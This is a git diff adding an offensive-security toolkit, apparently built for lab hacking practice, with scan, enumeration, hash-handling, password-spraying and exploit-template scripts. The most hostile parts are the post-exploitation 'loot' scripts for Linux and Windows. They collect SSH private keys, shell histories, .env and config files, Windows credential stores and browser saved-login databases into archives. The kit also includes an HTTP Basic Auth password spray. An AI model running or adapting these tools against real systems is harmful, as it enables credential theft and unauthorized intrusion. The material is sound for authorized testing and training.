echo "[+] tmux session '$session' created. Attach: tmux attach -t $session"

61
bin/automation/web_recon.sh Executable file
View File

@@ -0,0 +1,61 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <target> [--url]
target: IP/host (probes common web ports) or full URL with --url
Runs headers/tech detect, backup hunter, shallow dirb, and optional screenshots.
USAGE
exit 1
}
target=${1:-}
[[ -z "$target" ]] && usage
mode=url
if [[ ${2:-} != "--url" && "$target" != http* ]]; then mode=host; fi
urls=()
if [[ $mode == host ]]; then
ports=(80 81 88 3000 5000 7001 7002 8000 8008 8080 8081 8088 8443 8888 9000 443 8443)
for p in "${ports[@]}"; do
for scheme in http https; do
code=$(curl -sk -o /dev/null -m 4 -w "%{http_code}" "$scheme://$target:$p/" || true)
if [[ "$code" != "000" ]]; then
urls+=("$scheme://$target:$p/")
break
fi
done
done
else
urls+=("$target")
fi
[[ ${#urls[@]} -eq 0 ]] && { echo "[!] No web service detected" >&2; exit 0; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
log="$outdir/web_recon_${ts}.log"
for u in "${urls[@]}"; do
echo "[+] Recon: $u" | tee -a "$log"
http_headers.sh "$u" | tee -a "$log" || true
tech_detect.sh "$u" | tee -a "$log" || true
backup_hunter.sh "$u" | tee -a "$log" || true
# shallow dir fuzz with smaller wordlist if present
wl=${WORDLIST:-/usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt}
if [[ -f "$wl" ]]; then
bin/web/dirbuster.sh "$u" "$wl" php,txt,conf | tee -a "$log" || true
else
bin/web/dirbuster.sh "$u" | tee -a "$log" || true
fi
done
if command -v gowitness >/dev/null 2>&1; then
echo "[+] Taking screenshots with gowitness" | tee -a "$log"
printf "%s\n" "${urls[@]}" | gowitness file -f - -P "$outdir/gowitness_${ts}" 2>&1 | tee -a "$log"
fi
echo "[+] Web recon complete. Log: $log" | tee -a "$log"

View File

@@ -0,0 +1,41 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <hosts.txt>
hosts.txt: list of domains/IPs (one per line). Probes web with httpx, screenshots with gowitness (if present), runs nuclei.
USAGE
exit 1
}
list=${1:-}
[[ -z "$list" || ! -f "$list" ]] && usage
if ! command -v httpx >/dev/null 2>&1; then echo "[!] httpx required" >&2; exit 2; fi
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
alive="$outdir/httpx_${ts}.txt"
urls="$outdir/urls_${ts}.txt"
nucout="$outdir/nuclei_${ts}.txt"
echo "[+] Probing with httpx"
httpx -silent -l "$list" -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -status-code -title -tech-detect -asn -ip -hash -server | tee "$alive"
cut -d ' ' -f1 "$alive" | sed 's/\x1b\[[0-9;]*m//g' | sort -u > "$urls"
echo "[+] Alive URLs: $(wc -l < "$urls") saved to $urls"
if command -v gowitness >/dev/null 2>&1; then
echo "[+] Screenshots with gowitness"
gowitness file -f "$urls" -P "$outdir/gowitness_${ts}" >/dev/null 2>&1 || true
fi
if command -v nuclei >/dev/null 2>&1; then
echo "[+] Running nuclei (tags: cves,exposures,misconfig)"
nuclei -l "$urls" -tags cves,exposures,misconfig -severity low,medium,high,critical -o "$nucout" -silent || true
echo "[+] Nuclei output: $nucout"
fi
echo "[+] Wide web recon complete. Outputs: $alive, $urls, $nucout"

51
bin/crypto/encoders.py Executable file
View File

@@ -0,0 +1,51 @@
#!/usr/bin/env python3
import sys, base64, urllib.parse
def usage():
print("Usage: encoders.py <cmd> [args]\n"
" b64e <data> base64 encode\n"
" b64d <data> base64 decode\n"
" urle <data> url encode\n"
" urld <data> url decode\n"
" hex <data> hex encode\n"
" unhex <hex> hex decode\n"
" xor <hex> <hex> xor two equal-length hex strings\n"
" rot <n> <text> caesar shift by n (n can be -ve)\n"
, file=sys.stderr)
sys.exit(1)
if len(sys.argv) < 3:
usage()
cmd = sys.argv[1]
if cmd == 'b64e':
print(base64.b64encode(sys.argv[2].encode()).decode())
elif cmd == 'b64d':
print(base64.b64decode(sys.argv[2]).decode(errors='ignore'))
elif cmd == 'urle':
print(urllib.parse.quote(sys.argv[2]))
elif cmd == 'urld':
print(urllib.parse.unquote(sys.argv[2]))
elif cmd == 'hex':
print(sys.argv[2].encode().hex())
elif cmd == 'unhex':
print(bytes.fromhex(sys.argv[2]).decode(errors='ignore'))
elif cmd == 'xor' and len(sys.argv) >= 4:
a = bytes.fromhex(sys.argv[2]); b = bytes.fromhex(sys.argv[3])
if len(a) != len(b):
print('Lengths differ', file=sys.stderr); sys.exit(2)
print(bytes(x^y for x,y in zip(a,b)).hex())
elif cmd == 'rot' and len(sys.argv) >= 4:
n = int(sys.argv[2]) % 26
out=''
for ch in sys.argv[3]:
if 'a' <= ch <= 'z':
out += chr((ord(ch)-97+n)%26+97)
elif 'A' <= ch <= 'Z':
out += chr((ord(ch)-65+n)%26+65)
else:
out += ch
print(out)
else:
usage()

29
bin/crypto/jwt_show.py Executable file
View File

@@ -0,0 +1,29 @@
#!/usr/bin/env python3
import sys, json, base64
def b64url_decode(s):
s = s.encode() if isinstance(s, str) else s
s += b'=' * (-len(s) % 4)
return base64.urlsafe_b64decode(s)
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <jwt>", file=sys.stderr); sys.exit(1)
parts = sys.argv[1].split('.')
if len(parts) < 2:
print('Invalid JWT', file=sys.stderr); sys.exit(2)
try:
header = json.loads(b64url_decode(parts[0]))
payload = json.loads(b64url_decode(parts[1]))
except Exception as e:
print(f'Decode error: {e}', file=sys.stderr); sys.exit(3)
print('Header:')
print(json.dumps(header, indent=2))
print('\nPayload:')
print(json.dumps(payload, indent=2))
if len(parts) > 2:
print('\nSignature (base64url):')
print(parts[2])

10
bin/dns/gobuster_dns.sh Executable file
View File

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
domain=${1:-}
wordlist=${2:-/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt}
threads=${3:-50}
[[ -z "$domain" ]] && { echo "Usage: $(basename "$0") <domain> [wordlist] [threads] (requires gobuster)" >&2; exit 1; }
command -v gobuster >/dev/null 2>&1 || { echo "[!] gobuster not found" >&2; exit 2; }
exec gobuster dns -d "$domain" -w "$wordlist" -t "$threads" -i

28
bin/dns/subenum.sh Executable file
View File

@@ -0,0 +1,28 @@
#!/usr/bin/env bash
set -euo pipefail
domain=${1:-}
[[ -z "$domain" ]] && { echo "Usage: $(basename "$0") <domain>" >&2; exit 1; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
out="$outdir/subs_${domain}_${ts}.txt"
if command -v subfinder >/dev/null 2>&1; then
echo "[+] subfinder -d $domain"
subfinder -silent -d "$domain" | tee "$out"
elif command -v amass >/dev/null 2>&1; then
echo "[+] amass enum -passive -d $domain"
amass enum -passive -d "$domain" | tee "$out"
else
echo "[!] subfinder/amass not found; trying minimal brute with wordlist"
wl=${WORDLIST:-/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt}
while read -r sub; do
host="$sub.$domain"
dig +short "$host" | head -n1 | grep -qE '.' && echo "$host"
done < "$wl" | tee "$out"
fi
echo "[+] Results saved to $out"

16
bin/dns/zone_transfer.sh Executable file
View File

@@ -0,0 +1,16 @@
#!/usr/bin/env bash
set -euo pipefail
domain=${1:-}
ns=${2:-}
[[ -z "$domain" ]] && { echo "Usage: $(basename "$0") <domain> [ns-server]" >&2; exit 1; }
if [[ -n "$ns" ]]; then
dig axfr "$domain" @"$ns"
else
for s in $(dig ns "$domain" +short); do
echo "[+] Trying NS: $s"
dig axfr "$domain" @"$s" || true
done
fi

21
bin/ftp_enum.sh Executable file
View File

@@ -0,0 +1,21 @@
#!/usr/bin/env bash
set -euo pipefail
ip=${1:-${TARGET:-}}
[[ -z "$ip" ]] && { echo "Usage: $(basename "$0") <ip>" >&2; exit 1; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${ip//\//_}_ftp_${ts}"
echo "[+] nmap ftp scripts"
nmap -Pn -p21 --script ftp-anon,ftp-banner,ftp-syst -oN "$base.nmap" "$ip" || true
echo "[+] Testing anonymous login"
{
echo "user anonymous"; echo "pass anonymous@"; echo "pwd"; echo "ls -la"; echo "quit"
} | ftp -inv "$ip" 2>&1 | tee "$base.anon.txt" || true
echo "[+] Saved to $base.*"

View File

@@ -0,0 +1,25 @@
#!/usr/bin/env python3
import sys, re
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <secretsdump.out> [outfile]", file=sys.stderr)
sys.exit(1)
path = sys.argv[1]
out = sys.argv[2] if len(sys.argv) > 2 else None
ntlm = []
with open(path, 'r', errors='ignore') as f:
for line in f:
# user:rid:lmhash:nthash::: (hashcat mode 1000)
if re.match(r'^\S+:[0-9]+:[0-9A-Fa-f]{32}:[0-9A-Fa-f]{32}:::', line):
ntlm.append(line.strip())
if out:
with open(out, 'w') as w:
w.write('\n'.join(ntlm)+'\n')
else:
print('\n'.join(ntlm))
print(f"[+] Extracted {len(ntlm)} NTLM lines", file=sys.stderr)

13
bin/hashes/john_pfx.sh Executable file
View File

@@ -0,0 +1,13 @@
#!/usr/bin/env bash
set -euo pipefail
file=${1:-}
[[ -z "$file" ]] && { echo "Usage: $(basename "$0") <file.pfx>" >&2; exit 1; }
if command -v pfx2john.py >/dev/null 2>&1; then
pfx2john.py "$file"
elif [[ -x /usr/share/john/pfx2john.py ]]; then
/usr/share/john/pfx2john.py "$file"
else
echo "[!] pfx2john.py not found. Install john-jumbo."
exit 2
fi

38
bin/ldap_enum.sh Executable file
View File

@@ -0,0 +1,38 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
echo "Usage: $(basename "$0") <ip> [user] [pass]" >&2
echo "- Tries to auto-detect base DN, then dumps common trees." >&2
exit 1
}
ip=${1:-${TARGET:-}}
user=${2:-}
pass=${3:-}
[[ -z "$ip" ]] && usage
bind_args=(-x)
if [[ -n "$user" ]]; then
bind_args=(-x -D "$user" -w "$pass")
fi
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${ip//\//_}_ldap_${ts}"
echo "[+] Query namingContexts"
BASES=$(ldapsearch -H "ldap://$ip" "${bind_args[@]}" -s base -b "" namingContexts 2>/dev/null | awk '/^namingContexts:/{print $2}')
if [[ -z "$BASES" ]]; then
echo "[!] Could not determine base DNs. Try manual -b."
exit 1
fi
echo "$BASES" | tee "$base.bases.txt"
for b in $BASES; do
echo "[+] Dumping base: $b" | tee -a "$base.dump.txt"
ldapsearch -H "ldap://$ip" "${bind_args[@]}" -b "$b" '(objectClass=*)' 2>/dev/null | tee -a "$base.dump.txt"
done
echo "[+] Saved to $base.*"

37
bin/misc/cyclic.py Executable file
View File

@@ -0,0 +1,37 @@
#!/usr/bin/env python3
import sys
def create(length):
pattern = ''
for A in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
for a in 'abcdefghijklmnopqrstuvwxyz':
for n in '0123456789':
if len(pattern) >= length:
return pattern[:length]
pattern += A + a + n
return pattern[:length]
def offset(sub):
pat = create(10000)
if sub.startswith('0x'):
sub = bytes.fromhex(sub[2:][::-1])
sub = sub.decode('latin1', 'ignore')
idx = pat.find(sub)
return idx if idx != -1 else None
def usage():
print("Usage:\n cyclic.py create <len>\n cyclic.py offset <needle>")
sys.exit(1)
if len(sys.argv) < 3:
usage()
cmd = sys.argv[1]
if cmd == 'create':
print(create(int(sys.argv[2])))
elif cmd == 'offset':
off = offset(sys.argv[2])
print(off if off is not None else 'Not found')
else:
usage()

16
bin/misc/extract_urls.py Executable file
View File

@@ -0,0 +1,16 @@
#!/usr/bin/env python3
import sys, re
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <file> [file2 ...]", file=sys.stderr); sys.exit(1)
pat=re.compile(r'(https?://[\w\-\.:%#@\?\/=\+&]+)')
seen=set()
for p in sys.argv[1:]:
try:
with open(p,'r',errors='ignore') as f:
for line in f:
for m in pat.findall(line):
if m not in seen:
seen.add(m); print(m)
except Exception as e:
print(f"[!] {p}: {e}", file=sys.stderr)

40
bin/misc/port_forward.sh Executable file
View File

@@ -0,0 +1,40 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage:
Local forward (access remote service locally):
$(basename "$0") -L <lport>:<rhost>:<rport> <user>@<ssh_host>
Remote forward (expose local service to remote):
$(basename "$0") -R <rport>:<lhost>:<lport> <user>@<ssh_host>
Dynamic SOCKS proxy:
$(basename "$0") -D <lport> <user>@<ssh_host>
USAGE
exit 1
}
[[ $# -lt 2 ]] && usage
flag=$1; spec=$2; host=${3:-}
case "$flag" in
-L)
[[ -z "$host" ]] && usage
echo "[+] ssh -N -L $spec $host"
exec ssh -N -L "$spec" "$host"
;;
-R)
[[ -z "$host" ]] && usage
echo "[+] ssh -N -R $spec $host"
exec ssh -N -R "$spec" "$host"
;;
-D)
host=$spec; lport=${host:-1080}
echo "[+] ssh -N -D $lport $host"
exec ssh -N -D "$lport" "$host"
;;
*) usage;;
esac

18
bin/misc/scan_secrets.sh Executable file
View File

@@ -0,0 +1,18 @@
#!/usr/bin/env bash
set -euo pipefail
dir=${1:-.}
[[ ! -d "$dir" ]] && { echo "Usage: $(basename "$0") <dir>" >&2; exit 1; }
patterns=(
'AWS_ACCESS_KEY_ID|AKIA[0-9A-Z]{16}'
'AWS_SECRET_ACCESS_KEY|(?i)aws(.{0,20})?(secret|access).{0,20}?[0-9A-Za-z/+]{40}'
'secret_key|private_key|BEGIN RSA PRIVATE KEY|BEGIN OPENSSH PRIVATE KEY'
'(?i)password\s*[:=]'
'(?i)api(_?key|token)\s*[:=]'
)
for p in "${patterns[@]}"; do
echo "[+] Pattern: $p"
rg -n --hidden -S -g '!node_modules' -g '!.git' -e "$p" "$dir" || true
done

20
bin/nfs_enum.sh Executable file
View File

@@ -0,0 +1,20 @@
#!/usr/bin/env bash
set -euo pipefail
ip=${1:-${TARGET:-}}
[[ -z "$ip" ]] && { echo "Usage: $(basename "$0") <ip>" >&2; exit 1; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${ip//\//_}_nfs_${ts}"
echo "[+] rpcinfo -p $ip"
rpcinfo -p "$ip" | tee "$base.rpcinfo.txt" || true
echo "[+] showmount -e $ip"
showmount -e "$ip" | tee "$base.exports.txt" || true
echo "[+] If there are exports, try: mount -t nfs $ip:/path /mnt -o vers=3"
echo "[+] Saved outputs under $base.*"

35
bin/nmap_full.sh Executable file
View File

@@ -0,0 +1,35 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <target> [--rate 5000]" >&2; exit 1; }
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && usage
shift || true
rate=5000
extra=()
while [[ $# -gt 0 ]]; do
case "$1" in
--rate) rate=${2:-5000}; shift 2;;
*) extra+=("$1"); shift;;
esac
done
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${target//\//_}_full_${ts}"
echo "[+] Phase1: All TCP ports scan (-p-) with min rate $rate"
nmap -Pn -p- --min-rate "$rate" -T4 -oA "$base.phase1" "$target" "${extra[@]}"
open_ports=$(grep -oE "/[0-9]+/open" "$base.phase1.gnmap" | cut -d/ -f2 | sort -un | paste -sd, -)
if [[ -z "$open_ports" ]]; then
echo "[!] No open TCP ports found."
exit 0
fi
echo "[+] Phase2: Version + scripts on ports: $open_ports"
nmap -Pn -sC -sV -p "$open_ports" -oA "$base.phase2" "$target"
echo "[+] Results saved under base: $base.phase1.* and $base.phase2.*"

22
bin/nmap_quick.sh Executable file
View File

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -euo pipefail
usage() {
echo "Usage: $(basename "$0") <target> [extra_nmap_args...]" >&2
echo "- Fast TCP scan with default scripts and service detection." >&2
exit 1
}
target=${1:-${TARGET:-}}
[[ -z "${target}" ]] && usage
shift || true
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${target//\//_}_quick_${ts}"
echo "[+] Running nmap quick against $target"
nmap -Pn -T4 -sC -sV -oA "$base" "$target" "$@"
echo "[+] Results saved to: ${base}.nmap | .gnmap | .xml"

25
bin/nmap_udp.sh Executable file
View File

@@ -0,0 +1,25 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <target> [--top 200]" >&2; exit 1; }
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && usage
shift || true
top=200
while [[ $# -gt 0 ]]; do
case "$1" in
--top) top=${2:-200}; shift 2;;
*) break;;
esac
done
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${target//\//_}_udp_top${top}_${ts}"
echo "[+] UDP scan top $top against $target"
nmap -Pn -sU --top-ports "$top" -T4 -oA "$base" "$target"
echo "[+] Results saved to: ${base}.*"

18
bin/passwords/hash_id.sh Executable file
View File

@@ -0,0 +1,18 @@
#!/usr/bin/env bash
set -euo pipefail
if command -v hashid >/dev/null 2>&1; then
exec hashid "$@"
fi
hash=${1:-}
[[ -z "$hash" ]] && { echo "Usage: $(basename "$0") <hash>" >&2; exit 1; }
len=${#hash}
case "$hash" in
*:*:*:*) echo "[guess] NTLM format (user:rid:lmhash:nthash:::). Hashcat 1000."; exit 0;;
esac
if [[ $len -eq 32 && "$hash" =~ ^[A-Fa-f0-9]+$ ]]; then echo "[guess] MD5 or NT (NTLM)"; exit 0; fi
if [[ $len -eq 40 && "$hash" =~ ^[A-Fa-f0-9]+$ ]]; then echo "[guess] SHA1"; exit 0; fi
if [[ $len -eq 64 && "$hash" =~ ^[A-Fa-f0-9]+$ ]]; then echo "[guess] SHA256"; exit 0; fi
echo "[guess] Unknown format"

5
bin/passwords/merge_dedupe.sh Executable file
View File

@@ -0,0 +1,5 @@
#!/usr/bin/env bash
set -euo pipefail
[[ $# -lt 1 ]] && { echo "Usage: $(basename "$0") <file1> [file2 ...]" >&2; exit 1; }
cat "$@" | tr -d '\r' | sed '/^\s*$/d' | sort -u

35
bin/passwords/mutate_words.py Executable file
View File

@@ -0,0 +1,35 @@
#!/usr/bin/env python3
import sys
leet_map = str.maketrans({'a':'@','A':'@','e':'3','E':'3','i':'1','I':'1','o':'0','O':'0','s':'$','S':'$'})
years = ['2020','2021','2022','2023','2024','2025']
suffixes = ['', '!', '@', '#', '1', '123', '321']
def mutate(w):
outs = set()
bases = [w, w.capitalize(), w.upper()]
for b in bases:
outs.add(b)
outs.add(b.translate(leet_map))
for y in years:
outs.add(b + y)
outs.add(b.translate(leet_map) + y)
for s in suffixes:
outs.add(b + s)
return outs
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} word1 [word2 ...] | - (stdin)", file=sys.stderr)
sys.exit(1)
words = sys.argv[1:]
if words == ['-']:
words = [w.strip() for w in sys.stdin if w.strip()]
final = set()
for w in words:
final |= mutate(w)
for v in sorted(final):
print(v)

View File

@@ -0,0 +1,25 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <url> <users.txt> <password>
Performs cautious HTTP Basic Auth spray (one pass).
USAGE
exit 1
}
url=${1:-}
users=${2:-}
pass=${3:-}
[[ -z "$url" || -z "$users" || -z "$pass" ]] && usage
while IFS= read -r u; do
[[ -z "$u" ]] && continue
code=$(curl -sk -o /dev/null -m 6 -w "%{http_code}" -u "$u:$pass" "$url" || true)
echo "$u\t$code"
sleep 1
done < "$users"
echo "[+] Note: Respect lockout policies. Use only with authorization."

View File

@@ -0,0 +1,8 @@
#!/usr/bin/env bash
set -euo pipefail
in=${1:-}
min=${2:-6}
max=${3:-64}
[[ -z "$in" ]] && { echo "Usage: $(basename "$0") <wordlist> [minlen] [maxlen]" >&2; exit 1; }
rg -N '^[\x20-\x7E]+$' "$in" | awk -v min="$min" -v max="$max" 'length($0)>=min && length($0)<=max' | sort -u

81
bin/post/linux_loot.sh Executable file
View File

@@ -0,0 +1,81 @@
#!/usr/bin/env bash
set -euo pipefail
# Safe, targeted loot collection for Linux. Default is conservative.
# Config via env:
# LOOT_DIR (default: ./loot)
# MAX_SIZE (default: 20971520 bytes = 20MB)
# INCLUDE_HIST (default: 1)
# INCLUDE_KEYS (default: 1)
# INCLUDE_CONFIGS (default: 1)
# INCLUDE_DB (default: 0)
# EXTRA_GLOBS (space-separated, optional)
LOOT_DIR=${LOOT_DIR:-loot}
MAX_SIZE=${MAX_SIZE:-20971520}
INCLUDE_HIST=${INCLUDE_HIST:-1}
INCLUDE_KEYS=${INCLUDE_KEYS:-1}
INCLUDE_CONFIGS=${INCLUDE_CONFIGS:-1}
INCLUDE_DB=${INCLUDE_DB:-0}
EXTRA_GLOBS=${EXTRA_GLOBS:-}
mkdir -p "$LOOT_DIR/listings" "$LOOT_DIR/files"
echo "[+] Collecting system summaries"
{
echo "# uname"; uname -a
echo "# os-release"; cat /etc/os-release 2>/dev/null || true
echo "# id"; id
echo "# users"; cat /etc/passwd | cut -d: -f1,3,4
echo "# sudo -n -l"; sudo -n -l 2>&1 || true
echo "# net"; ss -tunlp 2>/dev/null || netstat -tunlp 2>/dev/null || true
} > "$LOOT_DIR/listings/summary.txt"
collect_list() {
pat="$1"; hint="$2"
echo "[+] Searching: $hint ($pat)"
rg -n --hidden -S -g '!proc/**' -g '!sys/**' -g '!dev/**' -g '!run/**' -g '!var/log/**' --glob "$pat" / 2>/dev/null | awk -F: '{print $1}' | sort -u
}
to_pack=$(mktemp)
trap 'rm -f "$to_pack"' EXIT
if [[ "$INCLUDE_HIST" == "1" ]]; then
collect_list "**/.bash_history" "history" >> "$to_pack"
collect_list "**/.zsh_history" "history" >> "$to_pack"
fi
if [[ "$INCLUDE_KEYS" == "1" ]]; then
collect_list "**/.ssh/id_*" "ssh keys" >> "$to_pack"
collect_list "**/authorized_keys" "authorized_keys" >> "$to_pack"
fi
if [[ "$INCLUDE_CONFIGS" == "1" ]]; then
collect_list "**/*.conf" "configs" >> "$to_pack"
collect_list "**/.env" ".env" >> "$to_pack"
collect_list "**/*config*.php" "php configs" >> "$to_pack"
fi
if [[ "$INCLUDE_DB" == "1" ]]; then
collect_list "**/*.db" "sqlite db" >> "$to_pack"
collect_list "**/*.sqlite*" "sqlite db" >> "$to_pack"
collect_list "**/*.sql" "sql dumps" >> "$to_pack"
fi
for g in $EXTRA_GLOBS; do
collect_list "$g" "extra" >> "$to_pack"
done
echo "[+] Filtering paths; max size: $MAX_SIZE"
final=$(mktemp)
while IFS= read -r f; do
[[ -f "$f" ]] || continue
s=$(stat -c %s "$f" 2>/dev/null || stat -f %z "$f" 2>/dev/null || echo 0)
if [[ "$s" -le "$MAX_SIZE" ]]; then
echo "$f" >> "$final"
fi
done < <(sort -u "$to_pack")
tar -czf "$LOOT_DIR/files/linux_loot.tgz" -T "$final" 2>/dev/null || true
echo "[+] Loot archived: $LOOT_DIR/files/linux_loot.tgz"

36
bin/post/pack_report.sh Executable file
View File

@@ -0,0 +1,36 @@
#!/usr/bin/env bash
set -euo pipefail
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && { echo "Usage: $(basename "$0") <target> (or set TARGET)" >&2; exit 1; }
root=${HTB_ROOT:-$PWD}
troot="$root/targets/$target"
lootdir="$troot/loot"
scandir="$troot/scans"
notes="$troot/notes.md"
report="$troot/report_${target}_$(date +%Y%m%d_%H%M%S).md"
mkdir -p "$lootdir"
echo "[+] Generating report: $report"
{
echo "# Post-Exploitation Report — $target"
echo "\nGenerated: $(date)"
echo "\n## Summaries"
[[ -f "$lootdir/summary.txt" ]] && { echo "\n### System Summary"; sed -n '1,120p' "$lootdir/summary.txt"; }
[[ -f "$scandir/auto_recon_"*".summary.txt" ]] && { echo "\n### Recon Summary"; tail -n +1 "$scandir"/*summary.txt 2>/dev/null | sed 's/^/ /'; }
echo "\n## Loot Artifacts"
ls -lh "$lootdir" 2>/dev/null | sed 's/^/ /'
echo "\n## Scan Artifacts"
ls -1 "$scandir" 2>/dev/null | sed 's/^/ /'
echo "\n## Notes"
if [[ -f "$notes" ]]; then
sed -n '1,200p' "$notes" | sed 's/^/ /'
else
echo " (no notes.md found)"
fi
} > "$report"
echo "[+] Report saved: $report"

59
bin/post/windows_loot.ps1 Normal file
View File

@@ -0,0 +1,59 @@
# Safe, targeted loot collection for Windows. Conservative defaults.
# Env-like params via variables at top; modify as needed.
$LootDir = $(Join-Path (Get-Location) 'loot')
$MaxSize = 20971520 # 20 MB
$IncludeBrowser = $true
$IncludeCreds = $true
$IncludeSSH = $true
New-Item -Force -ItemType Directory -Path $LootDir | Out-Null
New-Item -Force -ItemType Directory -Path (Join-Path $LootDir 'files') | Out-Null
"[+] Collecting system summary" | Out-Host
Get-ComputerInfo | Out-File (Join-Path $LootDir 'summary.txt')
$files = New-Object System.Collections.ArrayList
function Add-IfSmall($path) {
if (Test-Path $path) {
$fi = Get-Item $path -ErrorAction SilentlyContinue
if ($fi -and $fi.Length -le $MaxSize) { [void]$files.Add($fi.FullName) }
}
}
# Common artifacts
$UserProfile = $env:USERPROFILE
Add-IfSmall "$UserProfile\\.ssh\\id_rsa"
Add-IfSmall "$UserProfile\\.ssh\\id_ed25519"
Add-IfSmall "$UserProfile\\.ssh\\known_hosts"
Add-IfSmall "$UserProfile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt"
Add-IfSmall "$UserProfile\\AppData\\Roaming\\Code\\User\\settings.json"
if ($IncludeCreds) {
Add-IfSmall "$UserProfile\\AppData\\Roaming\\Microsoft\\Credentials"
Add-IfSmall "$UserProfile\\AppData\\Local\\Microsoft\\Credentials"
}
if ($IncludeBrowser) {
Add-IfSmall "$UserProfile\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
Add-IfSmall "$UserProfile\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data"
Add-IfSmall "$UserProfile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
}
# Write file list
$listPath = Join-Path $LootDir 'filelist.txt'
$files | Sort-Object -Unique | Out-File $listPath
"[+] Files listed in $listPath" | Out-Host
"[+] Zip archive: $LootDir\\windows_loot.zip" | Out-Host
# Create archive
try {
Compress-Archive -Path (Get-Content $listPath) -DestinationPath (Join-Path $LootDir 'windows_loot.zip') -Force
} catch {
Write-Warning "Compress-Archive failed. Copying individual files."
foreach ($f in Get-Content $listPath) {
try { Copy-Item -Force -Path $f -Destination (Join-Path $LootDir 'files') } catch {}
}
}

11
bin/privesc/caps_scan.sh Executable file
View File

@@ -0,0 +1,11 @@
#!/usr/bin/env bash
set -euo pipefail
if ! command -v getcap >/dev/null 2>&1; then
echo "[!] getcap not found. On Debian/Ubuntu: apt install libcap2-bin" >&2
exit 1
fi
echo "[+] File capabilities"
getcap -r / 2>/dev/null | sort

50
bin/privesc/linux_quick_enum.sh Executable file
View File

@@ -0,0 +1,50 @@
#!/usr/bin/env bash
set -euo pipefail
echo "[+] Hostname / kernel / distro"
hostname || true
uname -a || true
cat /etc/os-release 2>/dev/null || true
echo
echo "[+] Users and groups"
id || true
whoami || true
cat /etc/passwd 2>/dev/null | cut -d: -f1,3,4 | head -n 5 || true
groups 2>/dev/null || true
echo
echo "[+] Sudo (non-interactive)"
sudo -n -l 2>&1 || echo "sudo -n -l failed (needs password?)"
echo
echo "[+] Env / PATH / umask"
printf 'PATH=%s\n' "$PATH"
umask || true
env | sort | head -n 20
echo
echo "[+] Cron jobs"
ls -la /etc/cron* 2>/dev/null || true
crontab -l 2>/dev/null || true
echo
echo "[+] Network"
ip a 2>/dev/null || ifconfig 2>/dev/null || true
ip r 2>/dev/null || route -n 2>/dev/null || true
ss -tunlp 2>/dev/null || netstat -tunlp 2>/dev/null || true
echo
echo "[+] Processes"
ps aux --sort=-%mem | head -n 15
echo
echo "[+] Interesting files (writable / root owned / backups)"
find / -type f -name "*.bak" -o -name "*.old" -o -name "*.orig" 2>/dev/null | head -n 50
find / -writable -type f -maxdepth 3 -not -path "/proc/*" 2>/dev/null | head -n 50
echo
echo "[+] SUID/SGID & Capabilities"
find / -perm -4000 -type f -not -path "/proc/*" -ls 2>/dev/null | head -n 50
command -v getcap >/dev/null && getcap -r / 2>/dev/null | head -n 50 || true

10
bin/privesc/suid_scan.sh Executable file
View File

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
echo "[+] SUID binaries"
find / -perm -4000 -type f -not -path "/proc/*" 2>/dev/null | sort
echo
echo "[+] SGID binaries"
find / -perm -2000 -type f -not -path "/proc/*" 2>/dev/null | sort

32
bin/pwn/pwntools_template.py Executable file
View File

@@ -0,0 +1,32 @@
#!/usr/bin/env python3
from pwn import *
context.update(arch='amd64', os='linux')
def start(argv=[], *a, **kw):
host = args.HOST or os.getenv('TARGET')
port = int(args.PORT or 1337)
if args.REMOTE and host:
return remote(host, port)
elif args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
init-peda
break main
continue
'''
exe = context.binary = ELF('./vuln', checksec=False)
def main():
io = start()
payload = b'A'*64
io.sendlineafter(b':', payload)
io.interactive()
if __name__ == '__main__':
main()

10
